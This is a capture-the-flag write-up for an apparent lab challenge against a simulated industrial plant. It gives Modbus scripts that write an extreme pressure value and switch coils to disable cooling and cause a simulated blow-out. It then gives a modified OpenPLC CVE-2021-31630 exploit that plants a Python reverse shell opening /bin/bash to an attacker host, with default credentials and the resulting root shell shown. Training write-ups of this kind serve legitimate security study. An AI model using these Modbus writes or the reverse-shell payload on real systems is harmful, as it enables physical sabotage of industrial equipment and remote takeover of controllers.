Overview#

Description: This challenge drops you into the shoes of the APT operator: With a single crafted Modbus, you over-pressurise the main pump, triggering a thunderous blow-out that floods the plant with alarms. While chaos reigns, your partner ghosts through the shaken DMZ and installs a stealth implant, turning the diversion’s echo into your persistent beachhead.
Difficulty: Medium
Category: OT (Operational Technology)
Points: 60

Triggering the Explosion#

Scanning The Targer#

To start the challenge, we need to scan the target IP address to identify open ports and services running on them. This is crucial for understanding how to interact with the Modbus protocol. when i did a general scan scan we found that port 8080,80 and 22 are open now let’s scan commen ports on Modbus protocol common-ports-scan we can see that port 502 is open, which is the default port for Modbus TCP/IP communication, and port 1880 is open, which is commonly used by Node-RED .

Interacting with Modbus#

Next, we need to interact with the Modbus service running on port 502. We can use tools like mbpoll,mbget or using python with modbus module to communicate with the Modbus server, i chose python.

I started scanning the Modbus registers and coils to understand where the pressure values are stored. The Modbus protocol uses function codes to read and write data, so we will use the read holding registers function (code 0x03) to read the pressure values. registers are used to store data in Modbus, and coils are used for binary values (on/off).

you need to install pymodbus module first:

1
pip install pymodbus

let’s identify the pressure register and the cooling system status register.

1
from pymodbus.client import ModbusTcpClient
2
import sys
3

4
client = ModbusTcpClient("<IP>", port=502)
5
addr = int(sys.argv[1]) if len(sys.argv) > 1 else 0
6
if client.connect():
7
    print("[+] Connected to Modbus server")
8

9
    try:
10
        # Read holding registers
11
        result = client.read_holding_registers(addr)
12
        if not result.isError():
13
            print(f"Holding registers: {result.registers}")
14

15
        # Read input registers
16
        result = client.read_input_registers(addr)
17
        if not result.isError():
18
            print(f"Input registers: {result.registers}")
19

20
    except Exception as e:
21
        print(f"[-] Error: {e}")
22
        pass
23

24
    client.close()
25
else:
26
    print("[-] Failed to connect")

result:
read-registers-result

then we change the pressure value to a high value to trigger the cooling system to activate.

1
from pymodbus.client import ModbusTcpClient
2

3
client = ModbusTcpClient("<IP>", port=502)
4
client.connect()
5

6
target_register = 0
7
value_to_write = 65535  # Dangerously high value
8

9
response = client.write_register(target_register, value_to_write)
10
print(response)
11
if not response.isError():
12
    print(f"[+] Successfully wrote {value_to_write} to 40001 (register 0)")
13
else:
14
    print("[-] Failed to write")
15

16
client.close()

result:
go check the web interface at http://<IP>/ and you will see that the pressure value is dangerously high, and the cooling system is activated.
then we need to find the cooling system coil by reading the coils:

1
from pymodbus.client import ModbusTcpClient
2

3
client = ModbusTcpClient("<IP>", port=502)
4
client.connect()
5

6
for i in range(1000):
7
    result = client.read_coils(i, count=10)
8
    if result.isError():
9
        print("Failed reading coils")
10
    else:
11
        if True in result.bits:
12
            print(f"results [{i}]: {result.bits}")
13
            print(f"Coil {i} is ON")
14
            break
15
        else:
16
            print(f"results [{i}]: {result.bits}")
17

18
    print("-" * 40)
19
    # result = client.
20
client.close()

now let’s turn off the cooling system by writing to the coil, this will trigger the explosion.

1
from pymodbus.client import ModbusTcpClient
2

3
client = ModbusTcpClient("<IP>", port=502)
4
client.connect()
5

6
for i in range(10, 17):
7
    client.write_coil(i, True)
8

9
res = client.read_coils(15, count=1)  # Read coil at address 0
10
print("[+] Cooling system turned off: ", res)
11
client.close()

result:
<img alt=“write-coils-result”src=“/kaboom-write-up-thm-industrial/write-coils-result.png” />

booom you got the flag at http://<IP>/

1st flag: THM{BOOM_BOOM_KABOOM}

Installing the Implant#

chech the platform at http://<IP>:8080/ and you will see that the system is down, and the cooling system is not working anymore.
we used a tool to upload the reverse shell directly to the hardware not the program section.

1
git clone git clone https://github.com/thewhiteh4t/cve-2021-31630/
2
cd cve-2021-31630

now we need to change the rev shell to python.
change template var at cve-2021-31630/cve_2021_31630.py line 66 to:

1
template = """
2

3
import psm
4
import time
5
import socket
6
import subprocess
7
import os
8

9
# Global variables
10
counter = 0
11
var_state = False
12
shell_ran = False  # Prevents running reverse shell multiple times
13

14

15
def hardware_init():
16
    psm.start()
17

18

19
def update_inputs():
20
    global counter
21
    global var_state
22
    psm.set_var("IX0.0", var_state)
23
    counter += 1
24
    if counter == 10:
25
        counter = 0
26
        var_state = not var_state
27

28

29
def update_outputs():
30
    global shell_ran
31
    a = psm.get_var("QX0.0")
32
    if a == True:
33
        print("QX0.0 is true")
34

35
    # Run reverse shell only once
36
    if not shell_ran:
37
        shell_ran = True
38
        try:
39
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
40
            s.connect(("<IP>",<PORT>))  # Replace with your LHOST and LPORT
41
            os.dup2(s.fileno(), 0)  # stdin
42
            os.dup2(s.fileno(), 1)  # stdout
43
            os.dup2(s.fileno(), 2)  # stderr
44
            subprocess.call(["/bin/bash", "-i"])
45
        except Exception as e:
46
            print(f"Shell error: {e}")
47

48

49
if __name__ == "__main__":
50
    hardware_init()
51
    while not psm.should_quit():
52
        update_inputs()
53
        update_outputs()
54
        time.sleep(0.1)
55
    psm.stop()
56

57
"""

and comment lines 188,189 and 190 to prevent cleaning up

1
    # sleep(1)
2
    # print('[!] Cleaning up...')
3
    # cleanup(sess_obj)

and change this on line 114:

1
     payload = {
2
        "hardware_layer": (None, b"python_on_linux"),
3
        "custom_layer_code": (None, modded_template),
4
    }

then run:

1
python3 cve_2021_31630.py \
2
  -lh <YOUR_IP_IN_SAME_SUB_WITH_THE_MACHINE> -lp 4444 \
3
  -u openplc -p openplc \
4
  http://10.10.222.93:8080/

open a listener on your machine:

1
nc -lvnp 4444

now enter the platfor with the credentials:
username: openplc
password: openplc
and on hardware section, change hardware layer from linux to python on linux (PSM) and click launch program
launch-program

then start the PLC again and you will get your reverse shell

1
➜  ~ nc -lvnp 4444
2
Connection from 10.10.219.182:41966
3
bash: cannot set terminal process group (1014): Inappropriate ioctl for device
4
bash: no job control in this shell
5
root@tryhackme:/opt/OpenPLC_v3/webserver#

now you can get the flag from the file /home/ubuntu/flag.txt

1
cat /home/ubuntu/flag.txt
2
FLAG{cooling_bypass_exploded}

> 2nd flag: FLAG{cooling_bypass_exploded}